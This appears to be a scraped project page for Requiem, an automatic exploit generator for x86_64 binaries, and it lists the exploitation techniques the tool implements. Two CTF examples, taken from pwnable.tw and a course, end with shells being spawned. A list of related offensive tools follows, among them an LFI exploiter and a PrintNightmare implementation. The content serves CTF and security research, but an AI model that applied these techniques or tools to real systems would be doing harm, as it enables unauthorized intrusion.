🎻 Modularized exploit generation framework

Related tags

Security related resourcesx86-64pwnctfpwntoolsbinary-exploitationaegqiling
Overview

Modularized exploit generation framework for x86_64 binaries


Overview

This project is still at early stage of development, so you might want to come back later...


Requiem is a modularized exploit generator for x86_64 binaries which emulates the target program with Qiling, and uses the user-provided PoC as the target program's input. During the target program's execution, Requiem monitors its I/O-related behaviors and employs taint analysis to collect information that can be later used for exploitation.

To use Requiem, a PoC must be provided because Requiem cannot perform symbolic execution. The target program will follow the execution path formed by the PoC, and when the target program reaches the crash state, Requiem will determine whether the crash state is exploitable by checking if RIP has been tainted.


If RIP has been tainted at the crash state, Requiem will generate an exploit which:

  • guides the target program to the exploitable state
  • exploits the program based on the strategy specified by the user.

Modularized?

Def: An exploitation "strategy" consists of a list of exploitation "techniques".

The idea is to implement some well-known exploitation techniqes as reusable and configurable "modules". The user can use the built-in techniques to exploit a x86_64 binary, or write a custom strategy/techniques to deal with Ad-hoc problems.

Implemented Techniques

  • ret2win (return to an arbitrary function specified by the user)
  • ret2csu (handling of different variants of __libc_csu_init is not implemented yet)
  • basic stack pivot (read(0, bss+n, 1024), pop rbp ; ret, leave ret)
  • advanced stack pivot (requires at least one call site of read())
  • GOT partial overwrite (overwrite LSB of [email protected] to acquire syscall, then sys_execve("/bin/sh", 0, 0))
  • mprotect + shellcode
  • ret2dlresolve
  • simple ASLR bypass (leak PIE/libc base addresses using available read primitives)
  • advanced ASLR bypass (leak PIE/libc base addresses with _IO_file_write when there are no read primitives)
  • ...

Implemented PoC Types

  • stdin
  • file
  • socket
  • ...

Dependencies

Installation

git clone https://github.com/aesophor/requiem
cd requiem
git submodule update --init --recursive

Examples

1. pwnable.tw: unexploitable (500 PTS)

The original challenge is on pwnable.kr and it is solvable.
This time we fix the vulnerability and now we promise that the service is unexploitable.

source

#include <stdio.h>
#include <unistd.h>

int main() {
    sleep(3);
    char buf[4];
    read(0, buf, 256);
}

checksec

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

result

$ ./requiem.py 'examples/unexploitable/unexploitable' 'examples/unexploitable/poc' --exec
--- Requiem: Modularized Exploit Generation Framework ---
Developed by: Marco Wang <[email protected]>

(skipped a few lines)

[x]    Error: PC(0x4141414141414141) Unreachable
[x]    RIP tainted. Generating exploit...
[=]    Generating exploit...
[=]    Deduced offset: 4 bytes
write primitives: [[4198745, 140737488412076, 256]]
write primitives: [[4198745, 140737488412076, 256]]
[=]    Generated exploit: examples/unexploitable/unexploitable_exploit.py
[=]    Executing exploit: examples/unexploitable/unexploitable_exploit.py
================================================================================
[+] Starting local process '/home/aesophor/Code/requiem/examples/unexploitable/unexploitable': pid 402588
[*] Switching to interactive mode
$ ls
README.md  examples  libs  requiem  requiem.py
$

2. CS 2017 Fall: readme

The length of stack-buffer overflow is very limited.
Only the saved RBP and the return address is controllable by the attacker.

source

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    char buf[0x20];
    setvbuf(stdout, 0, _IONBF, 0);
    printf("overflow me:");
    read(0, buf, 0x30);
}

checksec

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

result

$ ./requiem.py 'examples/readme/readme' 'examples/readme/poc' --exec
--- Requiem: Modularized Exploit Generation Framework ---
Developed by: Marco Wang <[email protected]>

(skipped a few lines)

[x]    Error: PC(0x4141414141414141) Unreachable
[x]    RIP tainted. Generating exploit...
[=]    Generating exploit...
[=]    Deduced offset: 32 bytes
write primitives: [[4198801, 140737488412064, 48]]
write primitives: [[4198801, 140737488412064, 48]]
[=]    Generated exploit: examples/readme/readme_exploit.py
[=]    Executing exploit: examples/readme/readme_exploit.py
================================================================================
[+] Starting local process '/home/aesophor/Code/requiem/examples/readme/readme': pid 402513
[*] Switching to interactive mode
overflow me:$ ls
README.md  examples  libs  requiem  requiem.py
$
Owner
ᴀᴇꜱᴏᴘʜᴏʀ
M.S. Student @ NCTU. Interested in modern C++, kernel and pwning.
ᴀᴇꜱᴏᴘʜᴏʀ
GitHub Repository
Yuyu Scanner is a Web Reconnaissance & Web Analysis Scanner to find assets and information about targets.

Yuyu Scanner Yuyu Scanner is a Web Reconnaissance & Web Analysis Scanner to find assets and information about targets. installation ! run as root

Justakazh 20 Nov 24, 2022
NS-LOOKUP - A python script for scanning website for getting ip address of a website

NS-LOOKUP A python script for scanning website for getting ip address of a websi

Spider Anongreyhat 5 Aug 02, 2022
This tool was created in order to automate some basic OSINT tasks for penetration testing assingments.

This tool was created in order to automate some basic OSINT tasks for penetration testing assingments. The main feature that I haven't seen much anywhere is the downloadd google dork function where t

Tobias 5 May 31, 2022
Searches for potentially vulnerable websites to local file inclusion, throughout the web and then exploits them for LFI

LFI-Hunter Searches for potentially vulnerable websites to local file inclusion, throughout the web and then exploits them for LFI A script written in

Anukul Pandey 6 Jan 30, 2022
Convert a collection of features to a fixed-dimensional matrix using the hashing trick.

FeatureHasher Convert a collection of features to a fixed-dimensional matrix using the hashing trick. Note, this requires Jina=2.2.4. Example Here I

Jina AI 5 Mar 15, 2022
A tool for making python source difficult to read.

obscurepy Description A tool for obscuring, or making python source code difficult to read. Table of Contents Installation Limitations Usage Disclaime

Andrew Christiansen 10 Jul 31, 2022
Python implementation for PrintNightmare using standard Impacket.

PrintNightmare Python implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527) using standard Impacket. Installtion $ pip3 install impacket

ollypwn 141 Dec 31, 2022
All in One CRACKER911181's Tool. This Tool For Hacking and Pentesting.🎭

This is A Python & Bash Programming Based Termux-Tool Created By CRACKER911181. This Tool Created For Hacking and Pentesting. If You Use This Tool To Evil Purpose,The Owner Will Never be Responsible

CRACKER911181 1 Jan 10, 2022
Docker Compose based system for running remote browsers (including Flash and Java support) connected to web archives

pywb Remote Browsers This repository provides a simple configuration for deploying any pywb with remote browsers provided by OWT/Shepherd Remote Brows

Webrecorder 10 Jul 28, 2022
Something I built to test for Log4J vulnerabilities on customer networks.

Log4J-Scanner Something I built to test for Log4J vulnerabilities on customer networks. I'm not responsible if your computer blows up, catches fire or

1 Dec 20, 2021
MozDef: Mozilla Enterprise Defense Platform

MozDef: Documentation: https://mozdef.readthedocs.org/en/latest/ Give MozDef a Try in AWS: The following button will launch the Mozilla Enterprise Def

Mozilla 2.2k Jan 08, 2023
A great and handy python obfuscator for protecting code.

Python Code Obfuscator A handy and necessary tool that can protect your code anytime! Mostly Command Line tool that will obfuscate your code. Features

Karim 5 Nov 18, 2022
TCP/UDP port scanner on python, usong scapy and multiprocessin

Port Scanner TCP/UDP port scanner on python, usong scapy and multiprocessing. Usage python3 scanner.py [OPTIONS] IP_ADDRESS [{tcp|udp}[/[PORT|PORT-POR

Egor Krokhin 1 Dec 05, 2021
这次是可可萝病毒!

可可萝病毒! 事情是这样的,我又开始不干正事了。 众所周知,在Python里,0x0等于0,但是不等于可可萝。 这很不好,我们得把它改成可可萝! 效果 一般的Python—— Python 3.8.0 (tags/v3.8.0:fa919fd, Oct 14 2019, 19:37:50) [MSC

黄巍 29 Jul 14, 2022
Lightweight and beneficial Dependency Injection plugin for apscheduler

Implementation of dependency injection for apscheduler Prerequisites: apscheduler-di solves the problem since apscheduler doesn't support Dependency I

Glib 11 Dec 07, 2022
Course: Information Security with Python

Curso: Segurança da Informação com Python Curso realizado atravès da Plataforma da Digital Innovation One Prof: Bruno Dias Conteúdo: Introdução aos co

Elizeu Barbosa Abreu 1 Nov 28, 2021
This collection of tools that makes it easy to secure and/or obfuscate messages, files, and data.

Scrambler App This collection of tools that makes it easy to secure and/or obfuscate messages, files, and data. It leverages encryption tools such as

Mystic 2 Aug 31, 2022
CVE-2021-44228 log4j 2.x rce漏洞检测工具

#1 使用说明 CVE-2021-44228 log4j 2.x rce漏洞检测工具,对目标链接发起get请求并利用dnslog探测是否有回显 $ python3 log4j-scan.py -h

CoCo ainrm- 4 Jan 13, 2022
Reverse engineered Parler API

Parler's unofficial API with all endpoints present in their iOS app as of 08/12/2020. For the most part undocumented, but the error responses are alre

393 Nov 26, 2022
Tool-X is a kali linux hacking Tool installer.

Tool-X is a kali linux hacking Tool installer. Tool-X developed for termux and other Linux based systems. using Tool-X you can install almost 370+ hacking tools in termux app and other linux based di

Rajkumar Dusad 4.2k May 29, 2022